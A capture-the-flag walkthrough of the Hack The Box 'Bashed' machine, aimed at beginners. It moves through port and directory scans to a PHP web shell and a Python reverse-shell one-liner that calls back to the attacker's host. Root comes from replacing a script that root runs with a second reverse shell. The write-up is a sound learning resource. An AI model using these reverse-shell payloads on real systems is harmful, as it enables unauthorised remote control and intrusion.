Bashed

Today we will go over the bashed box, this is a great box to get started with for beginners as it teaches you the foundation that you need going forward with hacking topics.

Reconnaissance

This time around we are going to try Autorecon, which is an awesome tool to get your information gathering skills up.

┌──(kali㉿kali)-[~/HTB]
└─$ nmap -sC -sV -p 80 10.10.10.68
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-13 18:57 EST
Nmap scan report for 10.10.10.68
Host is up (0.11s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site

Gobuster Scan

┌──(kali㉿kali)-[~/HTB]
└─$ gobuster dir --url http://10.10.10.68/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.68/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/03/13 19:01:39 Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 311] [--> http://10.10.10.68/images/]
/uploads              (Status: 301) [Size: 312] [--> http://10.10.10.68/uploads/]
/php                  (Status: 301) [Size: 308] [--> http://10.10.10.68/php/]    
/css                  (Status: 301) [Size: 308] [--> http://10.10.10.68/css/]    
/dev                  (Status: 301) [Size: 308] [--> http://10.10.10.68/dev/]    
/js                   (Status: 301) [Size: 307] [--> http://10.10.10.68/js/]     
/fonts                (Status: 301) [Size: 310] [--> http://10.10.10.68/fonts/]

Finding PHP Shell Site

Uploading a Reverse Shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("Your Kali IP",PortHere));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

┌──(kali㉿kali)-[~]
└─$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.14.31] from (UNKNOWN) [10.10.10.68] 38812
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ python -c 'import pty; pty.spawn("/bin/bash");'
www-data@bashed:/var/www/html/dev$ whoami
whoami
www-data
www-data@bashed:/var/www/html/dev$ sudo -l
sudo -l
Matching Defaults entries for www-data on bashed:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
    User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL

Becoming Script Manager

www-data@bashed:/var/www/html/dev$ sudo -u scriptmanager ls
sudo -u scriptmanager ls
phpbash.min.php  phpbash.php
www-data@bashed:/var/www/html/dev$ sudo -u scriptmanager whoami
sudo -u scriptmanager whoami
scriptmanager
www-data@bashed:/var/www/html/dev$ sudo -u scriptmanager bash
sudo -u scriptmanager bash
scriptmanager@bashed:/var/www/html/dev$ sudo -l

Escalating Privilege

scriptmanager@bashed:/scripts$ cat test.txt
cat test.txt
testing 123!

scriptmanager@bashed:/scripts$ cat test.py
cat test.py
f = open("test.txt", "w")
f.write("testing 123!")
f.close

scriptmanager@bashed:/scripts$ ls -l
ls -l
total 8
-rw-r--r-- 1 scriptmanager scriptmanager 58 Dec  4  2017 test.py
-rw-r--r-- 1 root          root          12 Mar 13 16:24 test

Changing File

scriptmanager@bashed:/scripts$ mv test.py baktest.py
mv test.py baktest.py
scriptmanager@bashed:/scripts$ ls
ls
baktest.py  test.txt
scriptmanager@bashed:/scripts$ touch test.py
touch test.py
scriptmanager@bashed:/scripts$ echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.31",7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' > test.py
<o(),2);p=subprocess.call(["/bin/sh","-i"]);' > test.py                      
scriptmanager@bashed:/scripts$ cat test.py
cat test.py
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.31",7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

Obtaining Root

┌──(kali㉿kali)-[~]
└─$ nc -lvnp 7777
listening on [any] 7777 ...
connect to [10.10.14.31] from (UNKNOWN) [10.10.10.68] 45928
/bin/sh: 0: can't access tty; job control turned off
# whoami
root
# python -c 'import pty; pty.spawn("/bin/bash");'
root@bashed:/scripts# ls

PreviousOSCP Preperation NextNibbles

Last updated 4 years ago

Was this helpful?